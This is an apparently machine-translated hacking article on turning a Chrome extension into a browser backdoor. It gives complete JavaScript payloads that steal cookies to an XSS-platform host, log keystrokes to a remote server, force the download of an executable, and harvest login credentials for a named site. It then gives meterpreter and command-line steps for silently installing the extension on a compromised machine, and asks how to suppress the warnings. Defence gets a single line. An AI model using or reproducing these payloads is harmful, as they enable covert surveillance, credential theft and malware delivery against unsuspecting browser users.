Analysis of Hack With Chrome Extension

Analysis of Hack With Chrome Extension

0x00 Introduction

As we all know, Web applications are becoming more and more popular. Many of them use Web, such as lifestyle, office, and entertainment. Browsers are one of the most commonly used tools for accessing the Web. With the powerful Web functions, the browser functions become more and more powerful. This article introduces the attack posture and tactics through the Chrome plug-in.

At the time of writing this article, I only conducted some tests on the Chrome browser. If you are interested, you can go deeper. This article mainly provides an idea.

0x01 Write Chrome Extension

Before learning how to write a plug-in, we should first understand the file structure of the plug-in, download a Google plug-in, rename it as a zip extension, and decompress it. The decompressed file directory is as follows:

Here, manifest. json is the main file to declare information about the plug-in to be written. You can understand mainfest. json as the plug-in entry, that is, chrome needs to use manifest. json to understand the files to be referenced by your plug-in, the permissions required, and the plug-in icons. Other files are script files and plug-in icons that can implement the plug-in function.

Next, we start to construct our hack extension.

First, write the manifest. json file as follows:

#! Js {"name": "demo", // The name displayed by the plug-in "description": "demo", // the description of the plug-in "version": "1.0 ", // plug-in version "manifest_version": 2, // the new version of chrome forces manifest_version to 2 // plug-in icon "icons": {"16": "imgs/ico.png ", "32": "imgs/ico.png", "48": "imgs/ico.png", "128": "imgs/ico.png "}, // define some background features "background": {"scripts": [// script executed when loading the plug-in "js/call. js "," lib/jquery. min. js "]}," content_scripts ": [// defines automatically loaded content {" matches ": [// conditions for executing the plug-in" "]," js ": ["lib/jquery. min. js ", // meet the requirements for future executed scripts" js/check. js "]}], // plug-in permission" permissions ": [" tabs "," http: // */"," https ://*/", "background", "webRequest", "storage", "browsingData"]}

Create the following files:

Now, all the files are complete, but there is no function yet. Try to load the plug-in and enter chrome: // extensions/in the URL bar of the browser to load the decompressed extension, then select the folder where the file is located.

Then the plug-in is loaded:

0x02 How to Hack

The plug-in can be loaded successfully. How can we use it for attack? Let's start writing it.

1. XSS Platform

Configure the XSS platform and obtain the project code as follows:

#!js<script src=http://t.cn/xxxxxxx></script>

Access the http://t.cn/xxxxxx to get the code and write it to check. js with the following content:

#!js??(function(){(new Image()).src='http://xss9.com/index.php?do=api&id=xxxxxx&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();if(''==1){keep=new Image();keep.src='http://xss9.com/index.php?do=keepsession&id=xxxxxx&url='+escape(document.location)+'&cookie='+escape(document.cookie)};

Save the file, reload the plug-in, access any website, and obtain the cookie information of the website, such:

2. Keyloger

Write the following Payload into check. js:

#! Js $ (document). ready (function () {var server = "http://server.com/"; // receiving server var gate = "data. php? Data = "; // Receiving File var tabURL = window. location. href; var keys =''; document. onkeypress = function (e) {get = window. event? Event: e; key = get. keyCode? Get. keyCode: get. charCode; key = String. fromCharCode (key); keys + = key;} window. setInterval (function () {new Image (). src = server + gate + keys; keys = '';}, 1000 );});

The received php file is as follows. Name this file data. php on the server:

#!php

Configure keylog.txt on the server and then grant the 777 permission.

After the plug-in is loaded, the keyboard record starts. When a user enters the keyboard on a webpage, the input data is sent to the remote server.

3. ForceDownload

Force download file Payload is as follows. After the plug-in is installed, access any website to force download the program:

#! Php $ (document ). ready (function () {var server = "http://server.com/"; // server var gate = "/test/test.exe"; // file var tabURL = window to download. location. href; var link = document. createElement ('A'); link. href = server + gate; link. download = ''; document. body. appendChild (link); link. click ();});

4. Get Wooyun Password

The following Payload is used to obtain the account and password for logging on to wooyun.

#! Php $ (document). ready (function () {var server = "http://xss9.com/"; // send address var gate = "index. php? Do = api & id = xxxxx "; // The receiving parameter var tabURL = window. location. href; if (tabURL. indexOf ('wooyun. org ')! =-1) {wooyun ();} function email () {var email = document. getElementsByName ('email ') [0]. value; var password = document. getElementsByName ('Password') [0]. value; var data = "& username =" + email + "& password =" + password; new Image (). src = server + gate + data; // console. log ("email =" + email + "& password =" + password)} function wooyun () {document. getElementById ('subbtn '). onmouseover = email ;}});

Modify payload to obtain the password information of a website account.

Payload has introduced so much that children's shoes familiar with the front end will certainly be able to create more fancy ways to play.

0x03 When to Use

Maybe my friends will ask, what is the use of this? I don't need to install this plug-in to catch my own password. Of course, this is definitely not for yourself. During the penetration test, have you ever seen that the Administrator often uses the Chrome browser, but we cannot get the frequently used password? (The Administrator does not use the browser to remember the password ). In this case, in addition to installing a keyboard recorder for the system, we can also install our plug-ins for its browser. This plug-in can be used to collect various sensitive information, and it targets all websites accessed by browsers!

In addition, I found that chrome can install plug-ins through command lines to imagine a scenario where we use a vulnerability or social engineering to gain James's computer control, now there is a meterpreter session as follows:

Run the following command:

#!bashmeterpreter > run post/windows/gather/enum_chrome

We can see that the target system is installed with the chrome browser.

Upload the plug-in directory demo to e: \ demo \ unzip for decompression. The specific operations are as follows:

Run the following command to find the installed decompression software:

Run the following command to decompress and delete the compressed package:

Add a plug-in for chrome. Run the following command:

#!bash"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"  --load-extension="F:\demo\demo" --silent-launch 

The default installation path is chrome. If no installation path is available, run the dir command. -- load-extension is the plug-in path to be loaded. -- silent-launch indicates that chrome is not enabled and installation is silent. Note: The plug-in can be loaded successfully only when chrome is not running.

The preceding commands have two disadvantages:

Disadvantage 1: there will be the following prompt (it will disappear in a few seconds ).

Disadvantage 2: There are icons and prompts.

I have been trying to solve the above problems. The icons can be replaced with transparent or commonly used plug-in images. The other two are not yet resolved. For detailed chrome commands, refer to here: chromium-command-line. If you have any friends who have a solution, please do not hesitate to give us further advice. Of course, you can also try to write a small program to monitor chrome. Once chrome is enabled, click the event to cancel.

The best way is to install the plug-in directly for him. After the prompts are clicked, the prompt will not appear again for later use, which can be hidden for a long time.

Then I controlled all James's access content, just like this figure:

Of course, in addition to the above exploitation methods, you can also implement this function by releasing some plug-ins so that they contain attack code.

0x04 How to Defend

Do not install plug-ins of unknown origins. If any problem is found, change your account and password as soon as possible.

0x05 Summarize

This article mainly introduces a way of thinking in the penetration test process. Interested partners can continue to test plug-ins of other browsers. This method is simple, but the effect is good and you deserve it. You can download the above file: Extension_Backdoor.